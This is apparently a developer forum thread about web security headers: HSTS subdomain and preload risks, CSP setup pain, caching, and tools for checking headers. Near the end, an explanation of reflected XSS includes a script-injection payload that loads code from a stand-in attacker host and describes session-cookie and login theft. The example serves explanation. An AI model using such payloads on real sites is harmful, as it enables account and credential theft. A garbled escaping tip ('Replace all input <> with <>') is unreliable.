I'm going to recommend them to read this, but I do think I need to explain a couple of things that the article is not clear about:
- Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS enabled and preloading will break it permanently. I wish the authors made that more clear. Don't use includesubdomains and preload unless you know what you are doing. Scott Helme also did a great article about this .
- CSP can be really hard to set up. For instance: if you include google analytics, you need to set a script-src and a img-src. The article does a good job of explaining you should use CSP monitoring (I recommend sentry), but it doesn't explain how deceptive it can be. You'll get tons of reports of CSP exceptions caused by browsers plugins that attempt to inject CSS or JS. You must learn to distinguish which errors you can fix, and which are out of your control.
- Modern popular frontend frameworks will be broken by CSP as they rely heavily on injecting CSS (a concept known as JSS or 'styled components'). As these techniques are often adopted by less experienced devs, you'll see many 'solutions' on StackOverflow and Github that you should set unsafe-inline in your CSP. This is bad advise as it will bascially disable CSP! I have attempted to raise awareness in the past but I always got the 'you're holding it wrong' reply (even on HN). The real solution is that your build system should separate the CSS from JS during build time. Not many popular build systems (such as create-react-app) support this.
- Cache control can be really hard too. If you don't have time to fiddle with these settings, I recommend using a host like Netlify, they seem to do a proper job at caching in my experience.
Great point that is even more important than people might realize at first when reading your comment, because it doesn't cover only your web properties; it covers all subdomains even those you forget you use and don't associate with your web presence.
You have a nas at nas.exemple.com, a webmail at mail.exemple.com, a third party cdn/similar routing at cdn.exemple.com, a printer interface at printer.office.exemple.com and other internals things at internally routed path, like that custom old dashboard written 15 years ago ? Include subdomain covers it, and preloading means you can't disable it once you realize you shouldn't have done it.
Seen a few small non-IT companies hit by that, and then asking for urgent consultancy to fix it.
If it is preloaded (as the article suggest you should do), there is nothing you can do to 'fix' it, except migrating all other subdomains to HTTPS. Which is not always possible.
Also, no mention of E-tags. They help with caching.
+1. I'm kind of worried that the default copy-pasteable snippet there can lead to serious consequences. Well, less today when you can get certs for free, but you may have some unpleasent downtime.
The real solution is to fix the actual protocol issues, instead of imposing arbitrary limitations on what scripts can do with the page. If you pause and think about what these security measures are aiming to mitigate, they themselves are at best amateurish.
As a motivator I always say look at the network tab and think about how you can make stuff faster. It was this mindset where I first saw these additional requests and thought 'WTF!' I better find out why it is happening, turned out to be preflight requests.
Reinventing the wheel is also a good way to fool yourself into assuming we're being clever and productive. I mean, it's as if everyone who preceded me in a field was incapable of looking into a problem I've managed to find a hacky solution in 5 minutes.
Meanwhile let's not pretend that there are currently about half dozen standards and specifications for HATEOAS, all involving ugly hacks around response documents and funny media types, when all it takes to achieve the same goal is passing link relations through Link headers.
Not sure what you mean by this paragraph. JSS and styled components are both specific JS libraries that provide a way to write styles in JS and compile them to normal CSS. They both support normal server-side rendering of CSS that could be included in the HTML like any traditional web page.
The general term for this concept is “CSS-in-JS.” The libraries do not rely on inline styles, even though the general term may suggest that.
I’m not very familiar with JSS, but styled components absolutely supports building CSS in create-react-app.
The problem is that JSS injects the CSS dynamically at runtime. There seems to be no real solution to extract the CSS into a .css file at compile time.
The only solution that the JSS developers suggest  is using server-side rendering to inject a nonce into the HTML script tag to bypass CSP. But I think that requiring server-side rendering for a client-side rendered framework is totally backwards. The whole reason why I use single page client side rendered applications is so I can deploy on a CDN.
It's not always obvious because your gut reaction is "oh my web site is on www.", but that misconfigured naked domain redirect might indeed break "randomservice.example.com".
Are you or they able to elaborate on that? Headers are an active area of research/implementation for web security, are they working on any replacement to the entire concept?
Instead of using HSTS, you can also simply redirect any HTTP request to HTTPS. That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.
With HSTS, once they've connected to the server over HTTPS once (e.g. at home), every connection from that browser will be immediately upgraded to HTTPS before even trying HTTP.
Your suggestion is valid - as HSTS is only delivered over HTTPS - and the upgrade is still required the first time.
See Firesheep for an example of how HTTP can be intercepted - https://en.wikipedia.org/wiki/Firesheep
HSTS is designed to prevent this.
But even without preloading HSTS will improve security. Yes, the first visit will be susceptible to MITM, but every visit after that is not. This makes it a lot more difficult for an attacker as they must intercept the very first visit for the attack to work.
But even if it is not, it's still helpful for people connecting to your site again.
I think this comment sums up my whole point about how less experienced developers must learn how to use headers.
Like others have commented, HSTS is used to fix potential dangers in forwarding (MITM attacks), it also reduces overhead.
> That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.
If you use HSTS, you should always use a 301 permanent redirect as a fallback method for old browsers and other HTTP clients (like some libCurl implementations).
If MITM is a serious issue then it's an extremely bad idea to depend on individual developers of every website out there to mitigate this.
Bonus if your URLs get rewritten by something client side which is what HSTS is supposed to protect from and redirect does not.
There are backend bandaids and frontend bandaids but with the sheer amount of stack knowledge and framework knowledge required to do anything as a webdev these days, there's no way to stay on top of it all and we are just kinda winging some combination of best practices and getting shit done.
I don't know if things like PWAs and WASM is going to allow us to move towards a change yet, and would love input form someone with an opinion.
I think this is greatly exaggerated. You can get by just fine making your own sites knowing some basic html/css/maybe js, maybe some php too if you want backend stuff. Optionally some frameworks if you want, which should usually be easy enough to just follow some examples and get the functionality you want pretty fast.
If you're put on an existing web project, you probably only have to learn the bits immediately surrounding the things you do, picking it up as you go along. I still don't know Angular, React, Vue, or much else in the way of JS frameworks other than jQuery after being in web dev professionally for years, as it simply hasn't been needed.
Like how many sites still don't have mandatory HTTPS even though it is free and easy?
Now, I see that I can have a conversation with the browser at a different level. Headers allow me to dictate the intricate details of how this hardened security tool (the browser) will interact with my code.
HTTP headers do appear to be a duct tape solution, however, once you implement them and understand what is going on; your hindsight will be 20/20 and you'll probably see them differently.
From what I understand WebAssembly doesn't have anything to do with this issue. HTTP Headers are a contract between the server and client about what can happen on a webpage. WebAssembly is a programming language and virtual machine that executes code. WASM code executing inside a VM would still need HTTP headers defining permissions for its actions.
My point isn't that we shouldn't learn about headers and how thy can be used to help facilitate security, we should! My point is that largely we are trying to patch an insecure system with many different points of insecurity as we allow browsers and servers to do more and more things and need to think about this as a structural problem of web development, not a problem of a dev not understanding enough to set the right headers.
There's your problem!
> think about this as a structural problem of web development, not a problem of a dev not understanding enough
No, go back to your root cause and fix that.
From my research I've found that clients/managers only allow a development team to finish 15% of a feature before they consider it ready for production and demand a deployment. They don't understand security, testing, documentation, or hardening. Developers only have so much energy to roll these boulders uphill so eventually the crazy business people win. Today if you put a server on the internet you will be attacked within 20 seconds, and that will continue forever. If you start a business you have a 50% chance of being hacked. This really isn't an issue with the tools available, it's the developer effort and toxic work environment dubbed "Agile".
The web needs a real security model relevant to what browsers are doing today, not these piecemeal hacks ducktaped to a hypertext delivery protocol.
I am a big fan of restrictive CSP, but it's often hard to get there from an existing site. It's often better to do it in stages, e.g., when you work on page Q, you make that page have a restrictive CSP. Later, when you work on page R, that can grow one (or at least have fewer CSP issues). If having someone break into your site would be a serious problem, then you should speed up what it takes to get there.
Somebody else mentioned Scott Helme, but didn't link to three of his amazing sites:
https://securityheaders.com which checks important headers
https://report-uri.com/ which allows sending CSP reports to to catch errors. It also has a CSP builder (among a bunch of tools) which is hugely helpful: https://report-uri.com/home/generate
https://scotthelme.co.uk/ is his blog with a ton of info. It also has a cheat sheet for CSP: https://scotthelme.co.uk/csp-cheat-sheet/
(I might be a fan of the guy ha)
CSP in particular tends to get rather long-winded. As the article says, it can contain up to 24 policies, many of which contain their own lists! It's bound to get even more complicated as web apps integrate with an ever greater number of external services. Feature-Policy also looks like it could easily balloon to 1KB or more if you wanted to control all the features. No matter how much compression you add, at some point this is going to affect the load time. Additional TCP round trips aren't cheap, especially for HTML resources that usually aren't cached at the edge.
Wouldn't it be convenient if I could store a structured representation (JSON, YAML, whatever) at a predefined location under /.well-known/ and use ordinary Cache-Control headers to make browsers cache the rules?
Twitter sends over 6kb of CSP headers on every single request. This is what happens if you run loads of different advertisement and tracking vendors.
Now I understand why HTTP/2 uses compression for HTTP headers.
Looks like it's an inside joke from Twilio.
This is why loads of devs usually throw in the towel and disable CSP or use a unsafe-line. Basically like trying to solve a hard CSS problem and at some point give up and add !important statements everywhere.
It's also really, really hard to explain to customers that it takes time to set up, and every time they install a new tracking/ad/video/whatever plugin on their CMS, you'll have to spend time on adjusting the CSP accordingly.
That said, I do encourage developers to use CSP. It's a really powerful tool to secure your site and protect your visitors from fraud/phishing.
CSP headers are a very useful tool and I encourage everyone to use them. They are a PITA to set up though. Fortunately at least Firefox clearly communicates in console log when a CSP rule is hit, and how to relax it (if it was by mistake).
Note that CSP can be set as META tags too. There's a gotcha though: if they are set in both places (HTTP headers and HTML META tags), an intersection of the rules is used.
Look I understand that people in general feel the need to pretend that their work is very important and good but come on. You are not working for Warchild in a Lebanese refugee camp.
Developers connect people.
Developers help people.
Developers enable people.
One of the perks was that it was something you could do mostly by yourself, without dealing with the messy and irritating mass of humanity.
I tried adopting CSPs on all my sites to full Mozilla Observatory standard. One is a Go based Heroku instance, where I used unrolled/secure, though there are a few different packages achieving this. The others are static Netlify deploys using Netlify CMS. For those, you have to include a headers file (in my case I am instructing Hugo to build the site with a .headers media file included, which Netlify parses).
- It's a huge pain in the ass / trial and error process
- The formatting for CSP rules was evidently made to be as insufferable as imaginable. All on the same line, with commas and semicolons being the only separators, no line-breaks, tabs or anything allowed. Seriously, wtf
- When you think you've got it working, some other thing breaks in a weird, silent way
- Debugging CSPs in Firefox is nearly impossible (as for certain in-line scripts, you will need to get SHA values to tell the CSP to let them through. Chrome provides the SHA in the console. Firefox bizarrely doesn't.)
- Trying to integrate google recaptcha with CSP is hilariously complicated
- You should try to host all fonts yourself, lest you need to enable google or fontawesome exceptions for font, CSS, script and svg, because apparently that's what you need just to get an FB icon on your page to work
- Forget about React, or anything using inline-script or styles. Netlify CMS and the Netlify identity widget all require inline styles and scripts. Even generating SHA values for all of those, I could not get this stuff to work. In the end I gave up and disabled the CSP again
And this is for static sites using really simple tooling. I have yet to find a viable way to make this work.
edit (some additional notes):
- Tools like this one did not generate SHA values that were accepted by the CSP. I have tried a few different tools, checked all white spaces over and over. I just couldn't get it to work. Only Chrome returned the proper SHA value.
- I tried fixing a hover state loading in improperly (it flickered on first hover). This wasn't related to the CSP, but because I had to try lots of different things, like load in an SVG sprite, or png sprite, try pre-loading, use some JS, etc. etc. I had to keep changing the CSP to work with this, too. So applying a CSP should only be done at the end of a project. At the same time, if anything breaks from one day to the next, your debugging will now include the CSP as well most likely.
That's the format for HTTP headers. They could push against the standard and accept spaces, but anything else would break your browser.
Presumably that format was fine before bigger / more complex CSP rules came along?
I find it very difficult to work with visually. Hard to see where one thing stops and another starts.
If it was up to me, I would have placed the information at the linking tags inside the HTML (and JS, and CSS), or even extended the HTTP URI format in some way. There is probably a very good reason why people decided for the header, but I'm not aware of it.
The CII Best Practices Badge uses restrictive CSP. You can tell that here: https://securityheaders.com/?q=bestpractices.coreinfrastruct...
Scanner services like Mozilla Observatory / securityheaders.io / Qualys / etc only test a preset list of known best practices, they can't judge whether that technique is applicable for that site.
While it's usually good practice to follow the recommendations of such scanning services, you must always make sure you understand the implications.
curl -I -X GET \
Interestingly enough the blog this was posted on falls into the 94% not taking the effort to use CSP!
For another example, you could imagine a page on a website that includes the contents of a URL query in the response. For example, you visit www.goodsite.com/search.php?q=PurpleZebra, and the page displays "Your search for PurpleZebra did not return any results."
Now in the URL replace "PurpleZebra" with "<script src='evilsite.com/script.js'>" and trick someone into clicking on that link - now the error page delivered by goodsite.com includes the script from evilsite.com.
But either way, they both allow an attacker to display information on a website, when the content didn't originate from that site.
An example of how this could be really bad, would be a script that deletes all of the content from the document body and replaces it with a login screen. Rather than actually logging you in, it submits the username and password you entered to a site the attacker has control over.
Another, less obvious method, would be a script that captures your session cookie and submits that to another site the attacker has control over. If you were logged in to the site, the attacker could use the session cookie to authenticate to the site as you without logging in.
1) Don't click on bad URLs. (should be taught at kinder-garden by now)
2) Replace all input <> with <> etc.
I'm convinced scripts should not be able to read cookies for other domains?
Surely I'm missing something?
.dev hasn't been working locally for me for more than a year.